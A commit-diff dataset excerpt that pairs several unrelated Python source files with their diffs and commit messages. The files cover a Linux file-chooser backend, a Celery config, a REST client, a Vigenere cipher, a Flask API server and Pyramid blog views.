ret = self._process.poll()
if ret is not None:
if ret == self.successretcode:
out = self._process.communicate()[0].strip().decode('utf8')
self.selection = self._split_output(out)
self._handle_selection(self.selection)
return self.selection
else:
return None
time.sleep(0.1)
def _split_output(self, out):
'''This methods receives the output of the back-end and turns
it into a list of paths.
'''
return out.split(self.separator)
def _gen_cmdline(self):
'''Returns the command line of the back-end, based on the current
properties. You need to override this.
'''
raise NotImplementedError()
def run(self):
return self._run_command(self._gen_cmdline())
class ZenityFileChooser(SubprocessFileChooser):
'''A FileChooser implementation using Zenity (on GNU/Linux).
Not implemented features:
* show_hidden
* preview
'''
executable = "zenity"
separator = "|"
successretcode = 0
def _gen_cmdline(self):
cmdline = [
which(self.executable),
"--file-selection",
"--confirm-overwrite"
]
if self.multiple:
cmdline += ["--multiple"]
if self.mode == "save":
cmdline += ["--save"]
elif self.mode == "dir":
cmdline += ["--directory"]
if self.path:
cmdline += ["--filename", self.path]
if self.title:
cmdline += ["--name", self.title]
if self.icon:
cmdline += ["--window-icon", self.icon]
for f in self.filters:
if type(f) == str:
cmdline += ["--file-filter", f]
else:
cmdline += [
"--file-filter",
"{name} | {flt}".format(name=f[0], flt=" ".join(f[1:]))
]
return cmdline
class KDialogFileChooser(SubprocessFileChooser):
'''A FileChooser implementation using KDialog (on GNU/Linux).
Not implemented features:
* show_hidden
* preview
'''
executable = "kdialog"
separator = "\n"
successretcode = 0
def _gen_cmdline(self):
cmdline = [which(self.executable)]
filt = []
for f in self.filters:
if type(f) == str:
filt += [f]
else:
filt += list(f[1:])
if self.mode == "dir":
cmdline += [
"--getexistingdirectory",
(self.path if self.path else os.path.expanduser("~"))
]
elif self.mode == "save":
cmdline += [
"--getopenfilename",
(self.path if self.path else os.path.expanduser("~")),
" ".join(filt)
]
else:
cmdline += [
"--getopenfilename",
(self.path if self.path else os.path.expanduser("~")),
" ".join(filt)
]
if self.multiple:
cmdline += ["--multiple", "--separate-output"]
if self.title:
cmdline += ["--title", self.title]
if self.icon:
cmdline += ["--icon", self.icon]
return cmdline
class YADFileChooser(SubprocessFileChooser):
'''A NativeFileChooser implementation using YAD (on GNU/Linux).
Not implemented features:
* show_hidden
'''
executable = "yad"
separator = "|?|"
successretcode = 0
def _gen_cmdline(self):
cmdline = [
which(self.executable),
"--file-selection",
"--confirm-overwrite",
"--geometry",
"800x600+150+150"
]
if self.multiple:
cmdline += ["--multiple", "--separator", self.separator]
if self.mode == "save":
cmdline += ["--save"]
elif self.mode == "dir":
cmdline += ["--directory"]
if self.preview:
cmdline += ["--add-preview"]
if self.path:
cmdline += ["--filename", self.path]
if self.title:
cmdline += ["--name", self.title]
if self.icon:
cmdline += ["--window-icon", self.icon]
for f in self.filters:
if type(f) == str:
cmdline += ["--file-filter", f]
else:
cmdline += [
"--file-filter",
"{name} | {flt}".format(name=f[0], flt=" ".join(f[1:]))
]
return cmdline
CHOOSERS = {
"gnome": ZenityFileChooser,
"kde": KDialogFileChooser,
"yad": YADFileChooser
}
class LinuxFileChooser(FileChooser):
'''FileChooser implementation for GNu/Linux. Accepts one additional
keyword argument, *desktop_override*, which, if set, overrides the
back-end that will be used. Set it to "gnome" for Zenity, to "kde"
for KDialog and to "yad" for YAD (Yet Another Dialog).
If set to None or not set, a default one will be picked based on
the running desktop environment and installed back-ends.
'''
desktop = None
if (str(os.environ.get("XDG_CURRENT_DESKTOP")).lower() == "kde"
and which("kdialog")):
desktop = "kde"
elif which("yad"):
desktop = "yad"
elif which("zenity"):
desktop = "gnome"
def _file_selection_dialog(self, desktop_override=desktop, **kwargs):
if not desktop_override:
desktop_override = desktop
# This means we couldn't find any back-end
if not desktop_override:
raise OSError("No back-end available. Please install one.")
chooser = CHOOSERS[desktop_override]
c = chooser(**kwargs)
return c.run()
def instance():
return LinuxFileChooser()
|
Python
| 0.000425
|
@@ -7114,16 +7114,21 @@
rride =
+self.
desktop%0A
|
a536da0d925201fc652b08ad27985f37c5bd4b6c
|
Fix relative_urls helper for call from initialization code
|
src/adhocracy/lib/helpers/site_helper.py
|
src/adhocracy/lib/helpers/site_helper.py
|
from pylons import config, app_globals as g
from pylons.i18n import _
from paste.deploy.converters import asbool
from adhocracy.model import instance_filter as ifilter
CURRENT_INSTANCE = object()
def get_domain_part(domain_with_port):
return domain_with_port.split(':')[0]
def domain():
return get_domain_part(config.get('adhocracy.domain'))
def name():
return config.get('adhocracy.site.name', _("Adhocracy"))
def relative_urls():
return asbool(config.get('adhocracy.relative_urls', 'false'))
def base_url(path='', instance=CURRENT_INSTANCE, absolute=False,
append_slash=False, config=config):
"""
Constructs an URL.
Path is expected to start with '/'. If not, a relative path to the current
object will be created.
If instance isn't defined, the current instance is assumed. Otherwise,
either an instance instance or None has to be passed.
If absolute is True, an absolute URL including the protocol part is
returned. Otherwise this is avoided, if relative_urls is set to True.
"""
if instance == CURRENT_INSTANCE:
instance = ifilter.get_instance()
if relative_urls():
if instance is None:
prefix = ''
else:
prefix = '/i/' + instance.key
if absolute:
protocol = config.get('adhocracy.protocol', 'http').strip()
domain = config.get('adhocracy.domain').strip()
result = '%s://%s%s%s' % (protocol, domain, prefix, path)
else:
result = '%s%s' % (prefix, path)
else:
protocol = config.get('adhocracy.protocol', 'http').strip()
domain = config.get('adhocracy.domain').strip()
if instance is None or g.single_instance:
subdomain = ''
else:
subdomain = '%s.' % instance.key
result = '%s://%s%s%s' % (protocol, subdomain, domain, path)
if result == '':
result = '/'
if append_slash and not result.endswith('/'):
result += '/'
return result
def shortlink_url(delegateable):
    """Absolute short link ("/d/<id>") for a delegateable."""
    path = "/d/%s" % delegateable.id
    return base_url(path, None, absolute=True)
|
Python
| 0.000006
|
@@ -444,16 +444,29 @@
ve_urls(
+config=config
):%0A r
@@ -1172,16 +1172,22 @@
ve_urls(
+config
):%0A%0A
|
3f8a29efa3128f8167306b46e47e7ac18cf592ab
|
set broker pool limit
|
celeryconfig.py
|
celeryconfig.py
|
"""Celery configuration: Redis broker/result backend, queues, and tuning."""
import os
import sys
import urlparse
from kombu import Exchange, Queue

sys.path.append('.')

# Redis databases 1 and 2 hold celery tasks and results respectively.
redis_url = os.environ.get('REDIS_URL', "redis://127.0.0.1:6379/")
if not redis_url.endswith("/"):
    redis_url += "/"

BROKER_URL = redis_url + "1"  # REDIS_CELERY_TASKS_DATABASE_NUMBER = 1
CELERY_RESULT_BACKEND = redis_url + "2"  # REDIS_CELERY_RESULTS_DATABASE_NUMBER = 2
REDIS_CONNECT_RETRY = True

# these options will be defaults in future as per http://celery.readthedocs.org/en/latest/getting-started/brokers/redis.html
BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True,
                            'fanout_patterns': True,
                            'visibility_timeout': 60  # one minute
                            }

CELERY_DEFAULT_QUEUE = 'core_high'
CELERY_QUEUES = [
    Queue('core_high', routing_key='core_high'),
    Queue('core_low', routing_key='core_low')
]

# added because https://github.com/celery/celery/issues/896
BROKER_POOL_LIMIT = None

CELERY_CREATE_MISSING_QUEUES = True
CELERY_ACCEPT_CONTENT = ['pickle', 'json']
CELERY_ENABLE_UTC = True
CELERY_TASK_RESULT_EXPIRES = 60*60  # 1 hour
CELERY_ACKS_LATE = True

# remove this, might fix deadlocks as per https://github.com/celery/celery/issues/970
# CELERYD_MAX_TASKS_PER_CHILD = 100
CELERYD_FORCE_EXECV = True
CELERY_TRACK_STARTED = True

# https://groups.google.com/forum/#!topic/celery-users/Y_ifty2l6Fc
CELERYD_PREFETCH_MULTIPLIER=1

# List of modules to import when celery starts.
CELERY_IMPORTS = ("tasks",)

CELERY_ANNOTATIONS = {
    'celery.chord_unlock': {'soft_time_limit': 60}  # 1 minute
}
|
Python
| 0
|
@@ -957,12 +957,11 @@
T =
-None
+100
%0A%0ACE
|
2ffea9e4d8c802c86261cf9819657e8a38c906a9
|
return the resource after saving it
|
genericclient/__init__.py
|
genericclient/__init__.py
|
import requests
from . import exceptions
_version = "0.0.12"
__version__ = VERSION = tuple(map(int, _version.split('.')))
MultipleResourcesFound = exceptions.MultipleResourcesFound
ResourceNotFound = exceptions.ResourceNotFound
HTTPError = exceptions.HTTPError
NotAuthenticatedError = exceptions.NotAuthenticatedError
BadRequestError = exceptions.BadRequestError
def hydrate_json(response):
    """Decode *response* body as JSON; raise ValueError with context otherwise."""
    try:
        return response.json()
    except ValueError:
        detail = "Response from server is not valid JSON. Received {}: {}".format(
            response.status_code,
            response.text,
        )
        raise ValueError(detail)
class Resource(object):
    """A single API record; attribute access outside `whitelist` proxies
    to the `payload` dict."""
    whitelist = (
        '__class__',
        '_endpoint',
        'payload',
        'save',
        'delete',
    )

    def __init__(self, endpoint, **kwargs):
        self._endpoint = endpoint
        self.payload = kwargs
        super(Resource, self).__init__()

    def __setattr__(self, name, value):
        if name == 'whitelist' or name in self.whitelist:
            return super(Resource, self).__setattr__(name, value)
        # Assigning a related resource stores its id, not the object.
        if isinstance(value, self.__class__) and hasattr(value, 'id'):
            value = value.id
        self.payload[name] = value

    def __getattribute__(self, name):
        if name == 'whitelist' or name in self.whitelist:
            return super(Resource, self).__getattribute__(name)
        return self.payload[name]

    def save(self):
        """Persist the resource: PUT (falling back to PATCH on a 400) when
        it already has an id, POST otherwise. Returns the resource itself
        so calls can be chained (previously returned None)."""
        url = self._endpoint.url
        if 'id' in self.payload:
            url = "{}{}{}".format(url, self.payload['id'], self._endpoint.trail)
            try:
                response = self._endpoint.request('put', url, json=self.payload)
            except exceptions.BadRequestError:
                response = self._endpoint.request('patch', url, json=self.payload)
            results = hydrate_json(response)
        else:
            response = self._endpoint.request('post', url, json=self.payload)
            results = hydrate_json(response)
        self.payload = results
        return self

    def delete(self):
        """Issue a DELETE for this resource's URL.

        BUG FIX: was `self.endpoint.trail`; `endpoint` is not in the
        whitelist, so __getattribute__ looked it up in `payload` and raised
        KeyError. The attribute is `_endpoint`.
        """
        url = "{}{}{}".format(self._endpoint.url, self.payload['id'], self._endpoint.trail)
        self._endpoint.request('delete', url)

    def __repr__(self):
        # BUG FIX: a missing 'id' surfaces as KeyError from the payload
        # lookup in __getattribute__, not AttributeError; catch both.
        try:
            pk = self.id
        except (AttributeError, KeyError):
            pk = None
        return '<Resource `{0}` id: {1}>'.format(self._endpoint.name, pk)
class Endpoint(object):
    """One resource collection of the API (e.g. ``/users/``)."""

    def __init__(self, api, name):
        self.api = api
        self.name = name
        self.trail = '/' if self.api.trailing_slash else ''
        self.endpoint = '%s%s' % (name, self.trail)
        self.url = "{}{}".format(self.api.url, self.endpoint)
        super(Endpoint, self).__init__()

    def filter(self, **kwargs):
        """GET the collection filtered by query params; list of Resources."""
        response = self.request('get', self.url, params=kwargs)
        rows = hydrate_json(response)
        return [Resource(self, **row) for row in rows]

    def all(self):
        """Every resource in the collection."""
        return self.filter()

    def get(self, **kwargs):
        """Fetch exactly one resource, by a direct lookup key or by filters."""
        # These keys address a single record directly by URL.
        for lookup in ('id', 'pk', 'slug', 'username'):
            if lookup in kwargs:
                url = "{0}{1}{2}".format(self.url, kwargs[lookup], self.trail)
                response = self.request('get', url)
                break
        else:
            url = self.url
            response = self.request('get', url, params=kwargs)

        if response.status_code == 404:
            raise exceptions.ResourceNotFound("No `{}` found for {}".format(self.name, kwargs))

        result = hydrate_json(response)
        if isinstance(result, list):
            # Filter queries return a list; it must contain exactly one row.
            if len(result) == 0:
                raise exceptions.ResourceNotFound("No `{}` found for {}".format(self.name, kwargs))
            if len(result) > 1:
                raise exceptions.MultipleResourcesFound("Found {} `{}` for {}".format(len(result), self.name, kwargs))
            return Resource(self, **result[0])
        return Resource(self, **result)

    def create(self, payload):
        """POST a new resource; raises HTTPError unless the API answers 201."""
        response = self.request('post', self.url, json=payload)
        if response.status_code != 201:
            raise exceptions.HTTPError(response)
        return Resource(self, **hydrate_json(response))

    def get_or_create(self, **kwargs):
        """Return the matching resource, creating it (with `defaults`) if absent."""
        defaults = kwargs.pop('defaults', {})
        try:
            return self.get(**kwargs)
        except ResourceNotFound:
            params = dict(kwargs)
            params.update(defaults)
            return self.create(params)

    def create_or_update(self, payload):
        """Save an existing resource (when `id` is given) or create a new one."""
        if 'id' in payload:
            return Resource(self, **payload).save()
        return self.create(payload)

    def delete(self, pk):
        """DELETE the resource addressed by *pk*; the API must answer 204."""
        url = "{}{}{}".format(self.url, pk, self.trail)
        response = self.request('delete', url)
        if response.status_code != 204:
            raise exceptions.HTTPError(response)
        return None

    def request(self, method, *args, **kwargs):
        """HTTP call through the shared session; maps 403/400 to exceptions."""
        response = getattr(self.api.session, method)(*args, **kwargs)
        if response.status_code == 403:
            raise exceptions.NotAuthenticatedError(response, "Cannot authenticate user `{}` on the API".format(self.api.session.auth[0]))
        elif response.status_code == 400:
            raise exceptions.BadRequestError(
                response,
                "Bad Request 400: {}".format(response.text)
            )
        return response

    def __repr__(self):
        return "<Endpoint `{}`>".format(self.url)
class GenericClient(object):
    """Thin dynamic REST client: any attribute access yields an Endpoint."""
    endpoint_class = Endpoint

    # Re-exported so callers can catch client.ResourceNotFound etc.
    MultipleResourcesFound = MultipleResourcesFound
    ResourceNotFound = ResourceNotFound
    HTTPError = HTTPError
    NotAuthenticatedError = NotAuthenticatedError
    BadRequestError = BadRequestError

    def __init__(self, url, auth=None, adapter=None, trailing_slash=False):
        self.session = requests.session()
        self.session.headers.update({'Content-Type': 'application/json'})
        if auth is not None:
            self.session.auth = auth
        if not url.endswith('/'):
            url = '{}/'.format(url)
        self.url = url
        self.trailing_slash = trailing_slash
        if adapter is not None:
            self.session.mount(url, adapter())
        super(GenericClient, self).__init__()

    def __getattribute__(self, name):
        # Only these names resolve normally; anything else becomes an
        # Endpoint for the resource of that name.
        real_attrs = ('session', 'url', 'endpoint_class', 'trailing_slash')
        if name in real_attrs:
            return super(GenericClient, self).__getattribute__(name)
        return self.endpoint_class(self, name)
|
Python
| 0.000079
|
@@ -2051,16 +2051,36 @@
results
+%0A return self
%0A%0A de
|
3abbba864df16e06a768b761baefd3d705008114
|
Update vigenereCipher: fixed typo
|
books/CrackingCodesWithPython/Chapter18/vigenereCipher.py
|
books/CrackingCodesWithPython/Chapter18/vigenereCipher.py
|
# Vigenere Cipher (Polyalphabetic Substitution Cipher)
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def main():
    """Demo: encrypt (or decrypt) a sample message and copy the result."""
    # This text can be downloaded from https://www.nostarch.com/crackingcodes/:
    myMessage = """Alan Mathison Turing was a British mathematician, logician, cryptanalyst, and computer scientist."""
    myKey = 'ASIMOV'
    myMode = 'encrypt'  # Set to either 'encrypt' or 'decrypt'.

    if myMode == 'encrypt':
        translated = encryptMessage(myKey, myMessage)
    elif myMode == 'decrypt':
        translated = decryptMessage(myKey, myMessage)

    print('%sed message:' % (myMode.title()))
    print(translated)
    copy(translated)
    print()
    print('The message has been copied to the clipboard.')
def encryptMessage(key, message):
    """Encrypt *message* with the Vigenere cipher under *key*."""
    return translateMessage(key, message, 'encrypt')
def decryptMessage(key, message):
    """Decrypt *message* with the Vigenere cipher under *key*.

    BUG FIX: called nonexistent `translatedMessage` (NameError at runtime);
    the helper is `translateMessage`.
    """
    return translateMessage(key, message, 'decrypt')
def translateMessage(key, message, mode):
    """Vigenere-translate *message* under *key*; mode is 'encrypt' or 'decrypt'."""
    output = []   # Collects the encrypted/decrypted characters.
    keyPos = 0    # Which letter of the key applies to the next letter.
    key = key.upper()

    for ch in message:
        idx = LETTERS.find(ch.upper())
        if idx == -1:
            # Not in LETTERS: append the symbol untranslated.
            output.append(ch)
            continue

        shift = LETTERS.find(key[keyPos])
        if mode == 'encrypt':
            idx += shift
        elif mode == 'decrypt':
            idx -= shift
        idx %= len(LETTERS)  # Handle any wraparound.

        # Preserve the original letter's case.
        if ch.isupper():
            output.append(LETTERS[idx])
        elif ch.islower():
            output.append(LETTERS[idx].lower())

        # Advance (and wrap) the key position only for translated letters.
        keyPos += 1
        if keyPos == len(key):
            keyPos = 0

    return ''.join(output)
# If vigenereCipher.py is run (instead of imported as a module), call
# the main() function:
# BUG FIX: `if __name__ = '__main__'` was a SyntaxError (assignment, not
# comparison).
if __name__ == '__main__':
    main()
|
Python
| 0.000001
|
@@ -2255,16 +2255,17 @@
name__ =
+=
'__main
|
41126795dec28c8c81f225f65589ba7aa264b4a6
|
allow any test sample size for cold start scenario
|
polara/recommender/coldstart/data.py
|
polara/recommender/coldstart/data.py
|
from collections import namedtuple
import numpy as np
import pandas as pd
from polara.recommender.data import RecommenderData
class ItemColdStartData(RecommenderData):
    """Data handler for the item cold-start evaluation scenario.

    Whole items are held out: the unique item set is split into folds and
    all ratings of the test fold's items become the cold-start holdout.
    """

    def __init__(self, *args, **kwargs):
        random_state = kwargs.pop('random_state', None)
        super(ItemColdStartData, self).__init__(*args, **kwargs)
        self._test_sample = 1
        self._test_unseen_users = False
        self.random_state = random_state
        try:
            permute = self.random_state.permutation
        except AttributeError:
            # no RandomState supplied - fall back to the global numpy RNG
            permute = np.random.permutation

        # build unique items list to split them by folds
        itemid = self.fields.itemid
        self._unique_items = permute(self._data[itemid].unique())

    def _split_test_index(self):
        """Boolean mask over self._data marking rows of cold-start items."""
        itemid = self.fields.itemid
        item_idx = np.arange(len(self._unique_items))
        cold_items_split = self._split_fold_index(item_idx, len(item_idx),
                                                  self._test_fold, self._test_ratio)
        cold_items = self._unique_items[cold_items_split]
        cold_items_mask = self._data[itemid].isin(cold_items)
        return cold_items_mask

    def _split_data(self):
        """Run the base split and additionally build the cold-item testset.

        BUG FIX: removed `assert self._test_sample > 1`, which contradicted
        the default `_test_sample = 1` set in __init__ (the assertion made
        the default configuration always fail) and forbade otherwise valid
        sample sizes.
        """
        assert self._test_ratio > 0
        assert not self._test_unseen_users

        update_rule = super(ItemColdStartData, self)._split_data()
        if any(update_rule.values()):
            testset = self._sample_test_items()
            self._test = self._test._replace(testset=testset)
        return update_rule

    def _sample_test_items(self):
        """Pair each cold item with known items rated by the same users."""
        userid = self.fields.userid
        itemid = self.fields.itemid

        holdout = self.test.evalset
        user_has_cold_item = self._data[userid].isin(holdout[userid].unique())
        sampled = super(ItemColdStartData, self)._sample_testset(user_has_cold_item, holdout.index)

        testset = (pd.merge(holdout[[userid, itemid]],
                            sampled[[userid, itemid]],
                            on=userid, how='inner',
                            suffixes=('_cold', ''))
                   .drop(userid, axis=1)
                   .drop_duplicates()
                   .sort_values('{}_cold'.format(itemid)))
        return testset

    def _sample_holdout(self, test_split):
        # every rating of a cold item goes into the holdout
        return self._data.loc[test_split, list(self.fields)]

    def _try_drop_unseen_test_items(self):
        # there will be no such items except cold-start items
        pass

    def _try_drop_invalid_test_users(self):
        # testset contains items only
        pass

    def _try_sort_test_data(self):
        # no need to sort by users
        pass

    def _assign_test_items_index(self):
        itemid = self.fields.itemid
        self._map_entity(itemid, self._test.testset)
        self._reindex_cold_items()  # instead of trying to assign known items index

    def _assign_test_users_index(self):
        # skip testset as it doesn't contain users
        userid = self.fields.userid
        self._map_entity(userid, self._test.evalset)

    def _reindex_cold_items(self):
        """Give cold items their own index alongside the training index.

        BUG FIX: `itemid` was referenced without being defined in this
        method (NameError); resolve it from self.fields first.
        """
        itemid = self.fields.itemid
        itemid_cold = '{}_cold'.format(itemid)
        cold_item_index = self.reindex(self.test.testset, itemid_cold, inplace=True, sort=False)
        new_item_index = (namedtuple('ItemIndex', 'training cold_start')
                          ._make([self.index.itemid, cold_item_index]))
        self.index = self.index._replace(itemid=new_item_index)
|
Python
| 0
|
@@ -1231,45 +1231,8 @@
%3E 0%0A
- assert self._test_sample %3E 1%0A
|
abf8f8638e84992a8a290534074d999c817d5ae7
|
Add token refresh support
|
src/b2share_server.py
|
src/b2share_server.py
|
# -*- coding: utf-8 -*-
from flask import Flask
from flask import request
from flask.ext.jsonpify import jsonify
from flask import Response, g, redirect, url_for, make_response
from werkzeug.routing import Rule
from functools import wraps
from model import User, Deposit
import json, sys
app = Flask(__name__)
# default headers
headers = {'Content-Type': 'application/json; charset=utf-8',
'Access-Control-Allow-Origin': 'http://localhost:8000',
'Access-Control-Allow-Headers': 'Content-Type, Authorization',
'Server': 'EUDAT-B2SHARE/UI-API-1.1.1'}
# helpers for response headers
def add_response_headers(headers={}):
    """Decorator factory: merge *headers* into every response of the view."""
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            response = make_response(func(*args, **kwargs))
            for header_name, header_value in headers.items():
                response.headers[header_name] = header_value
            return response
        return wrapper
    return decorator
def default_headers(f):
    """Apply the module-wide default response headers to view *f*."""
    @wraps(f)
    @add_response_headers(headers)
    def wrapped(*args, **kwargs):
        return f(*args, **kwargs)
    return wrapped
class Helper(object):
    """Shared request/response helpers for the API endpoints."""

    @classmethod
    def abort(cls, code, error_msg, base):
        """JSON error body plus the HTTP status *code*."""
        body = jsonify({'error': {"message": error_msg, "base": base}})
        return body, code

    @classmethod
    def user_authentication(cls):
        """Resolve the Authorization header to a ``(token, user)`` tuple.

        Expected header format: ``B2SHARE <token>``. ``user`` is None when
        the token is missing or matches no user.
        """
        auth_header = request.headers.get('Authorization', None)
        prefix = "B2SHARE"
        token = None
        if auth_header and auth_header[0:len(prefix)] == prefix:
            token = auth_header[len(prefix) + 1:]
        user = User.find_user(token=token)
        return (token, user)
# server payload
class B2shareServer(object):
    """Entry point wrapper around the Flask development server."""

    @classmethod
    def serve(cls):
        # debug=True enables the reloader on code changes
        app.run(debug=True, host='0.0.0.0')
# USER
# @app.endpoint('user#index')
# @default_headers
# def user_index():
# json = jsonify(Factory.users())
# return json, 200
@app.endpoint('user#authenticate')
@default_headers
def user_login(methods=["POST", "OPTIONS"]):
    """Authenticate a user from a JSON body with `email` and `password`.

    Returns the user JSON on success, 401 on bad credentials, 400 on a
    malformed body (missing keys).
    """
    # CORS preflight: answer OPTIONS with an empty body
    if request.method == "OPTIONS":
        return jsonify({}), 200
    try:
        jdata = json.loads(request.data)
        user = User.find_user(email=jdata['email'], password=jdata['password'])
        if user == None:
            return Helper.abort(401, "Unauthorized", base="Invalid credentials")
        return user.to_json(), 200
    except KeyError:
        # body parsed but lacked 'email' or 'password'
        return Helper.abort(400, "Bad Request", base="Invalid credentials")
# DEPOSIT
@app.endpoint('deposit#index')
@default_headers
def deposit_index(methods=["GET", "OPTIONS"]):
    """List deposits with ordering and pagination.

    Query params: order_by (default created_at), order (default desc),
    page_size (clamped into 1..10), page (minimum 1).
    """
    # CORS preflight
    if request.method == "OPTIONS":
        return jsonify({}), 200
    try:
        # authentication: a token that matches no user is rejected
        token, user = Helper.user_authentication()
        if token and user is None:
            return Helper.abort(401, "Unauthorized", base="Invalid credentials")

        # ordering
        order_by = request.args.get('order_by', 'created_at')
        order = request.args.get('order', 'desc')

        # pagination
        # BUG FIX: the original condition was `size > 10 and size < 1`,
        # which can never be true, so out-of-range sizes were never clamped.
        size = int(request.args.get('page_size', 10))
        if size > 10 or size < 1:
            size = 10
        page = int(request.args.get('page', 1))
        if page < 1:
            page = 1

        # get deposits, scoped to the authenticated user if any
        ds = Deposit.get_deposits(size=size, page=page, order_by=order_by,
                                  order=order, user=user)
        return Deposit.to_deposits_json(ds), 200
    except Exception:
        # narrowed from a bare `except:` so SystemExit etc. still propagate
        return Helper.abort(500, "Internal Server Error", base="Internal Server Error")
@app.endpoint('deposit#deposit')
@default_headers
def deposit(methods=["GET", "OPTIONS"]):
    """Fetch a single deposit by its `uuid` query parameter."""
    # CORS preflight
    if request.method == "OPTIONS":
        return jsonify({}), 200
    try:
        # authentication
        token, user = Helper.user_authentication()
        if token and user == None:
            return Helper.abort(401, "Unauthorized", base="Invalid credentials")
        # request
        uuid = request.args.get('uuid', None)
        if uuid == None:
            return Helper.abort(400, "Bad Request", base="Unknown Deposit request")
        deposit = Deposit.find_deposit(uuid=uuid, user=user)
        if deposit == None:
            return Helper.abort(404, "Not Found", base="Deposit not found")
        resp = Response(deposit.to_json())
        # NOTE(review): Flask responses use `status_code`; `resp.code` looks
        # like it sets an unused attribute — confirm intent.
        resp.code = 200
        if user:
            # refresh the caller's token on authenticated reads
            resp.headers['Token'] = "B2SHARE " + user.get_token()
        return resp
    except:
        return Helper.abort(500, "Internal Server Error", base="Internal Server Error")
@app.route("/")
@default_headers
def index():
    """Catch-all root route: this API exposes no index document."""
    return Helper.abort(404, "Not Found", base="Not found")
# routes
# URL rules mapping request paths onto the @app.endpoint handlers above.
# app.url_map.add(Rule('/users.json', endpoint="user#index"))
app.url_map.add(Rule('/user/authenticate.json', endpoint="user#authenticate"))
app.url_map.add(Rule('/deposit/index.json', endpoint="deposit#index"))
app.url_map.add(Rule('/deposit/deposit.json', endpoint="deposit#deposit"))
|
Python
| 0
|
@@ -515,16 +515,64 @@
ation',%0A
+ 'Access-Control-Expose-Headers': 'X-Token',%0A
'Ser
@@ -607,16 +607,16 @@
1.1.1'%7D%0A
-
%0A# helpe
@@ -2599,32 +2599,34 @@
ls%22)%0A
+ #
return user.to_
@@ -2633,24 +2633,188 @@
json(), 200%0A
+ resp = Response(user.to_json())%0A resp.code = 200%0A resp.headers%5B'X-Token'%5D = %22B2SHARE %22 + user.get_token()%0A return resp%0A
exce
@@ -3878,21 +3878,30 @@
re
-turn
+sp = Response(
Deposit.
@@ -3920,21 +3920,162 @@
json(ds)
-, 200
+)%0A resp.code = 200%0A if user:%0A resp.headers%5B'X-Token'%5D = %22B2SHARE %22 + user.get_token()%0A return resp
%0A
@@ -5032,32 +5032,32 @@
if user:%0A
-
@@ -5070,16 +5070,18 @@
eaders%5B'
+X-
Token'%5D
|
ae92abffcbe792d41ee7aafb08e59ba874f3a4c4
|
Fix migration dependencies
|
longclaw/basket/migrations/0003_auto_20170207_2053.py
|
longclaw/basket/migrations/0003_auto_20170207_2053.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-07 20:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Rename ``BasketItem.product`` to ``BasketItem.variant``."""

    # NOTE(review): confirm '0002_basketitem_product' actually exists in this
    # app's migration history — a missing dependency breaks `migrate`.
    dependencies = [
        ('basket', '0002_basketitem_product'),
    ]

    operations = [
        migrations.RenameField(
            model_name='basketitem',
            old_name='product',
            new_name='variant',
        ),
    ]
|
Python
| 0.000013
|
@@ -230,28 +230,17 @@
'000
-2_basketitem_product
+1_initial
'),%0A
|
0f70333ec715b75c5c5e0883e0c7a62584c13a70
|
add extensions to hire me route
|
portfolio/portfolio/views/default.py
|
portfolio/portfolio/views/default.py
|
"""Views for profolio app."""
import datetime
import json
import markdown
from bs4 import BeautifulSoup
from pyramid.httpexceptions import HTTPFound
from pyramid.response import Response
from pyramid.security import remember, forget
from pyramid.view import view_config
from sqlalchemy.exc import DBAPIError
from ..models import BlogPost
from ..security import check_credentials
from pyramid_mailer.message import Message
from pyramid.httpexceptions import HTTPNotFound
extensions = ['markdown.extensions.codehilite', 'markdown.extensions.tables']
def get_summary(html):
    """Return the <summary> element of a post's HTML, or the full HTML."""
    soup = BeautifulSoup(html, "html5lib")
    summary = soup.summary
    if summary:
        return str(summary)
    return html
@view_config(route_name="posts",
             renderer="../templates/posts.jinja2",
             permission="view")
def posts(request):
    """List every blog post, newest first."""
    try:
        all_posts = request.dbsession.query(BlogPost).all()
        entries = [{
            "title": post.title,
            "date": str(post.date),
            "summary": get_summary(post.html),
            "id": post.id
        } for post in all_posts[::-1]]
    except DBAPIError:
        return Response('It don\'t work right.', content_type='text/plain', status=500)
    return {'posts': entries}
@view_config(route_name="detail",
             renderer="../templates/post.jinja2",
             permission="view")
def detail(request):
    """Render a single post; 404 when the id is unknown."""
    post = (request.dbsession.query(BlogPost)
            .filter(BlogPost.id == request.matchdict['id'])
            .first())
    if post is None:
        return HTTPNotFound()
    return {"post": post}
@view_config(route_name="create",
             renderer="json",
             permission="create")
def create(request):
    """View for new BlogPost page.

    On POST with `title` and `body`, renders the markdown body to HTML,
    stores the post, and returns {"id": <new id>}; otherwise returns {}.
    """
    if request.method == "POST":
        post_dict_keys = list(request.POST.keys())
        if "title" in post_dict_keys and "body" in post_dict_keys:
            title = request.POST["title"]
            html = markdown.markdown(request.POST["body"],
                                     extensions=extensions)
            date = datetime.date.today()
            new_model = BlogPost(title=title, body=request.POST["body"], html=html, date=date)
            request.dbsession.add(new_model)
            # re-query to learn the id assigned by the database
            # NOTE(review): lookup by title returns the first match — assumes
            # titles are unique; confirm.
            id = request.dbsession.query(BlogPost).filter(BlogPost.title == title).first().id
            return {"id": id}
    return {}
@view_config(route_name="update",
             permission="update")
def update(request):
    """View for update page.

    On POST, re-renders the markdown body and updates the post addressed
    by the `id` route segment, then redirects home.
    """
    if request.method == "POST":
        title = request.POST["title"]
        html = markdown.markdown(request.POST["body"],
                                 extensions=extensions)
        query = request.dbsession.query(BlogPost)
        post_dict = query.filter(BlogPost.id == request.matchdict['id'])
        # bulk-update on the query object; no fetch needed
        post_dict.update({"title": title,
                          "body": request.POST["body"],
                          "html": html})
        return HTTPFound(location=request.route_url('home'))
    return {}
@view_config(route_name='home',
             renderer='../templates/home.jinja2',
             permission="view")
def home(request):
    """Render the static home page template."""
    return {}
@view_config(route_name='login',
             renderer='../templates/login.jinja2',
             require_csrf=False,
             permission="view")
def login(request):
    """Login View.

    On POST, verifies the submitted credentials and, on success, sets the
    auth cookie and redirects to the posts page; otherwise re-renders the
    login form.
    """
    if request.method == 'POST':
        username = request.params.get('Username', '')
        password = request.params.get('Password', '')
        if check_credentials(username, password):
            headers = remember(request, username)
            return HTTPFound(location=request.route_url('posts'),
                             headers=headers)
    return {}
@view_config(route_name='logout',
             permission="view")
def logout(request):
